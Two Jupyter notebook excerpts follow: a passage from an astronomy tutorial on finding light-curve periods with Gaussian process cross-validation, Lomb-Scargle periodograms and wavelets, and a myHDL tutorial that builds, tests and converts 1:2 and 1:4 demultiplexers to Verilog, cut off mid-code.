subsets of data on which train and evaluate teh data. What are this sets? - train set: on which the training proceeds - validation set: after the training, evaluation of trained model is made on the validation set - test set: final evaluation of the model, when all looks good The problem is... many times we don't have so much data to chunk into pieces. With small *N* we coud easily fall in a strong dependece of the selection of such subsets. Here is when Cross Validation comes to save us: it uses a subsample for training and then evaluate the model on the remaining data, by *folds*. ``` from sklearn.cross_validation import cross_val_score, KFold # 1) Instance the GP # Exponential Sine expsine= 1. 
* ExpSineSquared(length_scale=guess_period / 2., periodicity=guess_period, length_scale_bounds=(guess_period, 1.1*guess_period), periodicity_bounds=(guess_period/2, 1.5 * guess_period),) # Radial Basis Function rbf = 1.0 * RBF(length_scale=2 * guess_period, length_scale_bounds=(0.1 * guess_period, 4.0 * guess_period)) # kernel = expsine + rbf aux_seed = np.random gaussian_pr = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=50, random_state=aux_seed) # 2) Fit the model, using the maximization of the likelihood gaussian_pr.fit(lc_x2.time.values[:, np.newaxis], lc_x2.flux.values) # Define the Cross validation gpr_grid = { 'kernel' : [expsine + rbf], } n_kfolds = 5 CV = GridSearchCV(estimator=GaussianProcessRegressor(), param_grid=gpr_grid, n_jobs=2, cv=n_kfolds, refit=True, return_train_score=True, ) # Fit CV.fit(lc_x2.time.values[:, np.newaxis], lc_x2.flux.values) # Get the prediction, note the "phantom dimension" x_cv = np.linspace(lc_x2.time.values[0], lc_x2.time.values[-1], 1000)[:, None] y_cv = CV.predict(x_cv) fig = plt.figure(figsize=(9, 6)) gs1 = gridspec.GridSpec(3, 3) gs1.update(left=0.14, right=0.9, hspace=0.05) ax0 = fig.add_subplot(gs1[: -1, :]) ax1 = fig.add_subplot(gs1[-1, :], sharex=ax0) # Activate the first subplot plt.sca(ax0) # Vaex for the Kepler sampling ds_K.scatter('time', 'flux', label='Kepler sampling (N={0})'.format(len(ds_K)), c='navy', alpha=0.1, s=10) # CV ax0.plot(x_cv, y_cv, marker='o', color='lime', markersize=1) # # Initial data points ax0.plot(lc_x2.time, lc_x2.flux, 'o', c='w', label='LSST-like data points (N={0})'.format(len(lc_x2.index)), markersize=4, markeredgecolor='k') # Only neede d if vaex is going to be used: plt.sca(ax1) # Difference ax1.plot(x_grid, y_mean_post - y_cv, c='blueviolet', marker='*', markersize=1) # ax0.set_title('Gaussian Process Regression and Cross validation', color='green') ax0.set_ylabel(r'flux$_{normalized}$', fontsize=13) plt.tight_layout() ax0.set_facecolor('ghostwhite') 
ax0.legend(loc='upper left') ax1.set_xlabel(r'time $d$', fontsize=13) ax1.set_ylabel(r'posterior - cv', fontsize=13) # Results from the CV CV_res = CV.cv_results_ # Print the dictionary of the results, but in a nicer way if 0: pp = pprint.PrettyPrinter(indent=4) pp.pprint(CV_res) ``` ## Now... a different method ## Lomb Scargle Different modules available! **gatpsy**, **astropy**, **astroML**... and the less fancy **scipy** #### Starting with Fast LS ``` m_fls = gatspy.periodic.LombScargleFast(fit_period=True) m_fls.optimizer.period_range = (1, 100) m_fls.fit(lc_x.time.values, lc_x.flux.values, lc_x.e_flux.values) ``` First do the search on the coarse grid of frequencies, and then on a second step on a more fine grid ``` fls_period = m_fls.best_period ``` To plot the periodogram ``` periods = np.linspace(1, 100, 1000) scores = m_fls.score(periods) fig, ax = plt.subplots(1, figsize=(6, 4)) ax.plot(periods, scores) ax.set_xlabel(r'time $d$') ax.set_ylabel(r'periodogram power') ax.set_title('Periodogram for the Kepler-sampled LC', fontsize=13, color='forestgreen') ``` Phase diagram 1) fill an auxiliary array for the predicted shape in the phase diagram. 
A better fit would be using the first 4 more prominent periods 2) chunk time vector to fit in the phase plot 3) plot all together ``` aux_time = np.linspace(0, fls_period, 1000) flux_fit = m_fls.predict(aux_time) phase = (lc_x.time.values / fls_period) % 1 phasefit = (aux_time / fls_period) ds_K_phase = vx.from_arrays(phase=phase, flux=lc_x.flux.values) fig, ax = plt.subplots(1, figsize=(7, 5)) plt.sca(ax) kw = { 'vmin' : 1, 'colormap' : 'jet', 'background_color' : 'white', } ds_K_phase.plot('phase', 'flux', **kw) # ax[0].errorbar(phase, lc_x.flux.values, lc_x.e_flux.values, fmt='o') ax.plot(phasefit, flux_fit, '-', color='w') ax.set_xlim([0, 1]) ax.set_title('Phase plot', color='dimgray', fontweight='bold') ``` If we want to refine the period estimation ``` m2_fls = gatspy.periodic.LombScargleFast(fit_period=True) m2_fls.optimizer.set(period_range=(0.5 * fls_period, 2 * fls_period), first_pass_coverage=10) m2_fls.fit(lc_x.time.values, lc_x.flux.values, lc_x.e_flux.values) aux2_fls_period = m2_fls.best_period print('Optimized period: {0:.2f} d is {1} times the initial evaluation'.format(aux2_fls_period, aux2_fls_period / fls_period)) ``` For noisy light curves, a second optimization would be of special interest #### Now let's go to the traditional LS, to get the period of the sparse case Initialize the Lomb Scargle estimator ``` m_genls4 = gatspy.periodic.LombScargle(Nterms=3, fit_period=True) m_genls1 = gatspy.periodic.LombScargle(Nterms=1, fit_period=True) m_genls4.optimizer.period_range = (1, 100) m_genls1.optimizer.period_range = (1, 100) ``` Fit LS using the observed data ``` m_genls4.fit(lc_x2.time.values, lc_x2.flux.values) m_genls1.fit(lc_x2.time.values, lc_x2.flux.values) ``` Get best periods ``` genls4_periods = m_genls4.find_best_periods() genls1_periods = m_genls1.find_best_periods() ``` The most prominent periods: ``` genls4_periods, genls1_periods ``` Periodograms, internally calculating the frequency spacing ``` genls4_per = 
m_genls4.periodogram_auto() genls1_per = m_genls1.periodogram_auto() fig, ax = plt.subplots(1, 2, figsize=(9, 4)) ax[0].plot(genls4_per[0], genls4_per[1], ls='-', color='forestgreen') ax[1].plot(genls1_per[0], genls1_per[1], ls='-', color='darkorange') # Mark most prominent periods for p in range(len(genls4_per)): ax[0].axvline(genls4_periods[p]) ax[1].axvline(genls1_periods[p]) # Axis minimal setup for subp in ax: subp.set_xlim([1, 50]) subp.set_xlabel(r'period $d$', color='navy') subp.set_ylabel(r'power', color='navy') ax[0].set_title('LS using 4 components for fitting') ax[1].set_title('LS using 1 component for fitting') ``` ### Let's try the above on new datasets! ### BONUS: Wavelet Transform ``` time, flux = lc_x.time.values, lc_x.flux.values s0 = 0.5 sn = 2 nscales = np.log2(sn / s0) scales = np.arange(s0 / 2, sn, 0.01) m_wv = 'morl' #'morl'#'dmey' #'morl' [cfs, frequencies] = pywt.cwt(flux, scales, m_wv, ) #time[1] - time[0]) power = np.power(abs(cfs), 2) period = (1. / frequencies ) / cad1 # Auxiliary vector to sum over each frequency (period) aux_sum = np.sum(power, axis=1) # fig = plt.figure(figsize=(8, 8)) gs1 = gridspec.GridSpec(3, 5) gs1.update(left=0.14, right=0.98, hspace=0.2, wspace=0.7) ax0 = fig.add_subplot(gs1[: -1, : 3]) ax1 = fig.add_subplot(gs1[-1, : 3], sharex=ax0) ax2 = fig.add_subplot(gs1[: -1, 3 :], sharey=ax0) ax0.contourf(time, period, np.log2(power)) ax1.plot(time, flux) ax2.plot(aux_sum, np.linspace(period.min(), period.max(), aux_sum.size)) # ax0.set_yscale('log') ax0.set_ylim([period.min(), 50]) ax0.set_ylabel(r'period $d$') ax1.set_xlabel(r'time $d$') ax0.set_title('Wavelet map and its LC') ax2.set_xlabel(r'sum over period') plt.tight_layout() ```
github_jupyter
\title{myHDL Combinational Logic Elements: Demultiplexers (DEMUXs))} \author{Steven K Armour} \maketitle <h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#Refrances" data-toc-modified-id="Refrances-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Refrances</a></span></li><li><span><a href="#Libraries-and-Helper-functions" data-toc-modified-id="Libraries-and-Helper-functions-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Libraries and Helper functions</a></span></li><li><span><a href="#Demultiplexers" data-toc-modified-id="Demultiplexers-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Demultiplexers</a></span></li><li><span><a href="#1-Channel-Input:-2-Channel-Output-demultiplexer-in-Gate-Level-Logic" data-toc-modified-id="1-Channel-Input:-2-Channel-Output-demultiplexer-in-Gate-Level-Logic-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic</a></span><ul class="toc-item"><li><span><a href="#Sympy-Expression" data-toc-modified-id="Sympy-Expression-4.1"><span class="toc-item-num">4.1&nbsp;&nbsp;</span>Sympy Expression</a></span></li><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-4.2"><span class="toc-item-num">4.2&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-4.3"><span class="toc-item-num">4.3&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-4.4"><span class="toc-item-num">4.4&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbech" data-toc-modified-id="myHDL-to-Verilog-Testbech-4.5"><span class="toc-item-num">4.5&nbsp;&nbsp;</span>myHDL to Verilog Testbech</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-4.6"><span 
class="toc-item-num">4.6&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-4.6.1"><span class="toc-item-num">4.6.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraints" data-toc-modified-id="Board-Constraints-4.6.2"><span class="toc-item-num">4.6.2&nbsp;&nbsp;</span>Board Constraints</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-4.6.3"><span class="toc-item-num">4.6.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1-Channel-Input:4-Channel-Output-demultiplexer-in-Gate-Level-Logic" data-toc-modified-id="1-Channel-Input:4-Channel-Output-demultiplexer-in-Gate-Level-Logic-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic</a></span><ul class="toc-item"><li><span><a href="#Sympy-Expression" data-toc-modified-id="Sympy-Expression-5.1"><span class="toc-item-num">5.1&nbsp;&nbsp;</span>Sympy Expression</a></span></li><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-5.2"><span class="toc-item-num">5.2&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-5.3"><span class="toc-item-num">5.3&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-5.4"><span class="toc-item-num">5.4&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-5.5"><span class="toc-item-num">5.5&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-5.6"><span class="toc-item-num">5.6&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" 
data-toc-modified-id="Board-Circuit-5.6.1"><span class="toc-item-num">5.6.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraints" data-toc-modified-id="Board-Constraints-5.6.2"><span class="toc-item-num">5.6.2&nbsp;&nbsp;</span>Board Constraints</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-5.6.3"><span class="toc-item-num">5.6.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1-Channel-Input:4-Channel-Output-demultiplexer-via-DEMUX-Stacking" data-toc-modified-id="1-Channel-Input:4-Channel-Output-demultiplexer-via-DEMUX-Stacking-6"><span class="toc-item-num">6&nbsp;&nbsp;</span>1 Channel Input:4 Channel Output demultiplexer via DEMUX Stacking</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-6.1"><span class="toc-item-num">6.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-6.2"><span class="toc-item-num">6.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-6.3"><span class="toc-item-num">6.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-6.4"><span class="toc-item-num">6.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-6.5"><span class="toc-item-num">6.5&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-6.5.1"><span class="toc-item-num">6.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraint" data-toc-modified-id="Board-Constraint-6.5.2"><span class="toc-item-num">6.5.2&nbsp;&nbsp;</span>Board 
Constraint</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-6.5.3"><span class="toc-item-num">6.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1:2-DEMUX-via-Behavioral-IF" data-toc-modified-id="1:2-DEMUX-via-Behavioral-IF-7"><span class="toc-item-num">7&nbsp;&nbsp;</span>1:2 DEMUX via Behavioral IF</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-7.1"><span class="toc-item-num">7.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-7.2"><span class="toc-item-num">7.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-7.3"><span class="toc-item-num">7.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-7.4"><span class="toc-item-num">7.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-7.5"><span class="toc-item-num">7.5&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-7.5.1"><span class="toc-item-num">7.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraint" data-toc-modified-id="Board-Constraint-7.5.2"><span class="toc-item-num">7.5.2&nbsp;&nbsp;</span>Board Constraint</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-7.5.3"><span class="toc-item-num">7.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#1:4-DEMUX-via-Behavioral-if-elif-else" data-toc-modified-id="1:4-DEMUX-via-Behavioral-if-elif-else-8"><span class="toc-item-num">8&nbsp;&nbsp;</span>1:4 DEMUX via Behavioral 
if-elif-else</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-8.1"><span class="toc-item-num">8.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-8.2"><span class="toc-item-num">8.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-8.3"><span class="toc-item-num">8.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-8.4"><span class="toc-item-num">8.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Deployment" data-toc-modified-id="PYNQ-Z1-Deployment-8.5"><span class="toc-item-num">8.5&nbsp;&nbsp;</span>PYNQ-Z1 Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-8.5.1"><span class="toc-item-num">8.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraint" data-toc-modified-id="Board-Constraint-8.5.2"><span class="toc-item-num">8.5.2&nbsp;&nbsp;</span>Board Constraint</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-8.5.3"><span class="toc-item-num">8.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li><li><span><a href="#Demultiplexer-1:4-Behavioral-via-Bitvectors" data-toc-modified-id="Demultiplexer-1:4-Behavioral-via-Bitvectors-9"><span class="toc-item-num">9&nbsp;&nbsp;</span>Demultiplexer 1:4 Behavioral via Bitvectors</a></span><ul class="toc-item"><li><span><a href="#myHDL-Module" data-toc-modified-id="myHDL-Module-9.1"><span class="toc-item-num">9.1&nbsp;&nbsp;</span>myHDL Module</a></span></li><li><span><a href="#myHDL-Testing" data-toc-modified-id="myHDL-Testing-9.2"><span class="toc-item-num">9.2&nbsp;&nbsp;</span>myHDL Testing</a></span></li><li><span><a 
href="#Verilog-Conversion" data-toc-modified-id="Verilog-Conversion-9.3"><span class="toc-item-num">9.3&nbsp;&nbsp;</span>Verilog Conversion</a></span></li><li><span><a href="#myHDL-to-Verilog-Testbench" data-toc-modified-id="myHDL-to-Verilog-Testbench-9.4"><span class="toc-item-num">9.4&nbsp;&nbsp;</span>myHDL to Verilog Testbench</a></span></li><li><span><a href="#PYNQ-Z1-Board-Deployment" data-toc-modified-id="PYNQ-Z1-Board-Deployment-9.5"><span class="toc-item-num">9.5&nbsp;&nbsp;</span>PYNQ-Z1 Board Deployment</a></span><ul class="toc-item"><li><span><a href="#Board-Circuit" data-toc-modified-id="Board-Circuit-9.5.1"><span class="toc-item-num">9.5.1&nbsp;&nbsp;</span>Board Circuit</a></span></li><li><span><a href="#Board-Constraints" data-toc-modified-id="Board-Constraints-9.5.2"><span class="toc-item-num">9.5.2&nbsp;&nbsp;</span>Board Constraints</a></span></li><li><span><a href="#Video-of-Deployment" data-toc-modified-id="Video-of-Deployment-9.5.3"><span class="toc-item-num">9.5.3&nbsp;&nbsp;</span>Video of Deployment</a></span></li></ul></li></ul></li></ul></div> # Refrances # Libraries and Helper functions ``` #This notebook also uses the `(some) LaTeX environments for Jupyter` #https://github.com/ProfFan/latex_envs wich is part of the #jupyter_contrib_nbextensions package from myhdl import * from myhdlpeek import Peeker import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline from sympy import * init_printing() import itertools #EE drawing tools in python from https://cdelker.bitbucket.io/SchemDraw/ import SchemDraw as schem import SchemDraw.elements as e import SchemDraw.logic as l #https://github.com/jrjohansson/version_information %load_ext version_information %version_information myhdl, myhdlpeek, numpy, pandas, matplotlib, sympy, itertools, SchemDraw #helper functions to read in the .v and .vhd generated files into python def VerilogTextReader(loc, printresult=True): with open(f'{loc}.v', 'r') as vText: 
VerilogText=vText.read() if printresult: print(f'***Verilog modual from {loc}.v***\n\n', VerilogText) return VerilogText def VHDLTextReader(loc, printresult=True): with open(f'{loc}.vhd', 'r') as vText: VerilogText=vText.read() if printresult: print(f'***VHDL modual from {loc}.vhd***\n\n', VerilogText) return VerilogText def ConstraintXDCTextReader(loc, printresult=True): with open(f'{loc}.xdc', 'r') as xdcText: ConstraintText=xdcText.read() if printresult: print(f'***Constraint file from {loc}.xdc***\n\n', ConstraintText) return ConstraintText def TruthTabelGenrator(BoolSymFunc): """ Function to generate a truth table from a sympy boolian expression BoolSymFunc: sympy boolian expression return TT: a Truth table stored in a pandas dataframe """ colsL=sorted([i for i in list(BoolSymFunc.rhs.atoms())], key=lambda x:x.sort_key()) colsR=sorted([i for i in list(BoolSymFunc.lhs.atoms())], key=lambda x:x.sort_key()) bitwidth=len(colsL) cols=colsL+colsR; cols TT=pd.DataFrame(columns=cols, index=range(2**bitwidth)) for i in range(2**bitwidth): inputs=[int(j) for j in list(np.binary_repr(i, bitwidth))] outputs=BoolSymFunc.rhs.subs({j:v for j, v in zip(colsL, inputs)}) inputs.append(int(bool(outputs))) TT.iloc[i]=inputs return TT ``` # Demultiplexers \begin{definition}\label{def:MUX} A Demultiplexer, typically referred to as a DEMUX, is a Digital(or analog) switching unit that takes one input channel to be streamed to a single output channel from many via a control input. For single input DEMUXs with $2^n$ outputs, there are then $n$ input selection signals that make up the control word to select the output channel for the input. Thus a DEMUX is the conjugate digital element to the MUX such that a MUX is an $N:1$ mapping device and a DEMUX is a $1:N$ mapping device. From a behavioral standpoint DEMUXs are implemented with the same `if-elif-else (case)` control statements as a MUX but for each case, all outputs must be specified. 
Furthermore, DEMUXs are often implemented via stacked MUXs since there governing equation is the Product SET (Cartesian product) all internal products of a MUXs SOP equation \end{definition} # 1 Channel Input: 2 Channel Output demultiplexer in Gate Level Logic \begin{figure} \centerline{\includegraphics{DEMUX12Gate.png}} \caption{\label{fig:D12G} 1:2 DEMUX Symbol and Gate internals} \end{figure} ## Sympy Expression ``` x, s, y0, y1=symbols('x, s, y_0, y_1') y12_0Eq=Eq(y0, ~s&x) y12_1Eq=Eq(y1, s&x) y12_0Eq, y12_1Eq T0=TruthTabelGenrator(y12_0Eq) T1=TruthTabelGenrator(y12_1Eq) T10=pd.merge(T1, T0, how='left') T10 y12_0EqN=lambdify([s, x], y12_0Eq.rhs, dummify=False) y12_1EqN=lambdify([s, x], y12_1Eq.rhs, dummify=False) SystmaticVals=np.array(list(itertools.product([0,1], repeat=2))) print(SystmaticVals) print(y12_0EqN(SystmaticVals[:, 0], SystmaticVals[:, 1]).astype(int)) print(y12_1EqN(SystmaticVals[:, 0], SystmaticVals[:, 1]).astype(int)) ``` ## myHDL Module ``` @block def DEMUX1_2_Combo(x, s, y0, y1): """ 1:2 DEMUX written in full combo Inputs: x(bool): input feed s(bool): channel select Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 """ @always_comb def logic(): y0.next= not s and x y1.next= s and x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=2)) xTVs=np.array([i[1] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) sTVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) sTVs=np.append(sTVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, sTVs, xTVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s=Signal(bool(0)); Peeker(s, 's') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') DUT=DEMUX1_2_Combo(x, s, y0, y1) def 
DEMUX1_2_Combo_TB(): """ myHDL only testbench for module `DEMUX1_2_Combo` """ @instance def stimules(): for i in range(TestLen): x.next=int(xTVs[i]) s.next=int(sTVs[i]) yield delay(1) raise StopSimulation() return instances() sim=Simulation(DUT, DEMUX1_2_Combo_TB(), *Peeker.instances()).run() Peeker.to_wavedrom('x', 's', 'y0','y1') DEMUX1_2_ComboData=Peeker.to_dataframe() DEMUX1_2_ComboData=DEMUX1_2_ComboData[['x', 's', 'y0','y1']] DEMUX1_2_ComboData DEMUX1_2_ComboData['y0Ref']=DEMUX1_2_ComboData.apply(lambda row:y12_0EqN(row['s'], row['x']), axis=1).astype(int) DEMUX1_2_ComboData['y1Ref']=DEMUX1_2_ComboData.apply(lambda row:y12_1EqN(row['s'], row['x']), axis=1).astype(int) DEMUX1_2_ComboData Test0=(DEMUX1_2_ComboData['y0']==DEMUX1_2_ComboData['y0Ref']).all() Test1=(DEMUX1_2_ComboData['y1']==DEMUX1_2_ComboData['y1Ref']).all() Test=Test0&Test1 print(f'Module `DEMUX1_2_Combo` works as exspected: {Test}') ``` ## Verilog Conversion ``` DUT.convert() VerilogTextReader('DEMUX1_2_Combo'); ``` \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_Combo_RTL.png}} \caption{\label{fig:D12CRTL} DEMUX1_2_Combo RTL schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_Combo_SYN.png}} \caption{\label{fig:D12CSYN} DEMUX1_2_Combo Synthesized Schematic; Xilinx Vivado 2017.4} \end{figure} \begin{figure} \centerline{\includegraphics[width=10cm]{DEMUX1_2_Combo_IMP.png}} \caption{\label{fig:D12CIMP} DEMUX1_2_Combo Implementated Schematic; Xilinx Vivado 2017.4} \end{figure} ## myHDL to Verilog Testbech ``` #create BitVectors xTVs=intbv(int(''.join(xTVs.astype(str)), 2))[TestLen:] sTVs=intbv(int(''.join(sTVs.astype(str)), 2))[TestLen:] xTVs, bin(xTVs), sTVs, bin(sTVs) @block def DEMUX1_2_Combo_TBV(): """ myHDL -> testbench for module `DEMUX1_2_Combo` """ x=Signal(bool(0)) s=Signal(bool(0)) y0=Signal(bool(0)) y1=Signal(bool(0)) @always_comb def print_data(): print(x, s, y0, y1) #Test Signal Bit Vectors xTV=Signal(xTVs) 
sTV=Signal(sTVs) DUT=DEMUX1_2_Combo(x, s, y0, y1) @instance def stimules(): for i in range(TestLen): x.next=int(xTV[i]) s.next=int(sTV[i]) yield delay(1) raise StopSimulation() return instances() TB=DEMUX1_2_Combo_TBV() TB.convert(hdl="Verilog", initial_values=True) VerilogTextReader('DEMUX1_2_Combo_TBV'); ``` ## PYNQ-Z1 Deployment ### Board Circuit \begin{figure} \centerline{\includegraphics[width=5cm]{DEMUX12PYNQZ1Circ.png}} \caption{\label{fig:D12Circ} 1:2 DEMUX PYNQ-Z1 (Non SoC) conceptualized circuit} \end{figure} ### Board Constraints ``` ConstraintXDCTextReader('DEMUX1_2'); ``` ### Video of Deployment DEMUX1_2_Combo on PYNQ-Z1 ([YouTube](https://www.youtube.com/watch?v=LJG4Z2kxEKE)) # 1 Channel Input:4 Channel Output demultiplexer in Gate Level Logic ## Sympy Expression ``` x, s0, s1, y0, y1, y2, y3=symbols('x, s0, s1, y0, y1, y2, y3') y14_0Eq=Eq(y0, ~s0&~s1&x) y14_1Eq=Eq(y1, s0&~s1&x) y14_2Eq=Eq(y2, ~s0&s1&x) y14_3Eq=Eq(y3, s0&s1&x) y14_0Eq, y14_1Eq, y14_2Eq, y14_3Eq T0=TruthTabelGenrator(y14_0Eq) T1=TruthTabelGenrator(y14_1Eq) T2=TruthTabelGenrator(y14_2Eq) T3=TruthTabelGenrator(y14_3Eq) T10=pd.merge(T1, T0, how='left') T20=pd.merge(T2, T10, how='left') T30=pd.merge(T3, T20, how='left') T30 y14_0EqN=lambdify([x, s0, s1], y14_0Eq.rhs, dummify=False) y14_1EqN=lambdify([x, s0, s1], y14_1Eq.rhs, dummify=False) y14_2EqN=lambdify([x, s0, s1], y14_2Eq.rhs, dummify=False) y14_3EqN=lambdify([x, s0, s1], y14_3Eq.rhs, dummify=False) SystmaticVals=np.array(list(itertools.product([0,1], repeat=3))) print(SystmaticVals) print(y14_0EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) print(y14_1EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) print(y14_2EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) print(y14_3EqN(SystmaticVals[:, 2], SystmaticVals[:, 1], SystmaticVals[:, 0]).astype(int)) ``` ## myHDL Module ``` @block def DEMUX1_4_Combo(x, s0, s1, y0, y1, y2, y3): """ 1:4 DEMUX 
written in full combo Inputs: x(bool): input feed s0(bool): channel select 0 s1(bool): channel select 1 Outputs: y0(bool): ouput channel 0 y1(bool): ouput channel 1 y2(bool): ouput channel 2 y3(bool): ouput channel 3 """ @always_comb def logic(): y0.next= (not s0) and (not s1) and x y1.next= s0 and (not s1) and x y2.next= (not s0) and s1 and x y3.next= s0 and s1 and x return instances() ``` ## myHDL Testing ``` TestLen=10 SystmaticVals=list(itertools.product([0,1], repeat=3)) xTVs=np.array([i[2] for i in SystmaticVals]).astype(int) np.random.seed(15) xTVs=np.append(xTVs, np.random.randint(0,2, TestLen)).astype(int) s0TVs=np.array([i[1] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(16) s0TVs=np.append(s0TVs, np.random.randint(0,2, TestLen)).astype(int) s1TVs=np.array([i[0] for i in SystmaticVals]).astype(int) #the random genrator must have a differint seed beween each generation #call in order to produce differint values for each call np.random.seed(17) s1TVs=np.append(s1TVs, np.random.randint(0,2, TestLen)).astype(int) TestLen=len(xTVs) SystmaticVals, xTVs, s0TVs, s1TVs Peeker.clear() x=Signal(bool(0)); Peeker(x, 'x') s0=Signal(bool(0)); Peeker(s0, 's0') s1=Signal(bool(0)); Peeker(s1, 's1') y0=Signal(bool(0)); Peeker(y0, 'y0') y1=Signal(bool(0)); Peeker(y1, 'y1') y2=Signal(bool(0)); Peeker(y2, 'y2') y3=Signal(bool(0)); Peeker(y3, 'y3') DUT=DEMUX1_4_Combo(x, s0, s1, y0, y1, y2, y3) def 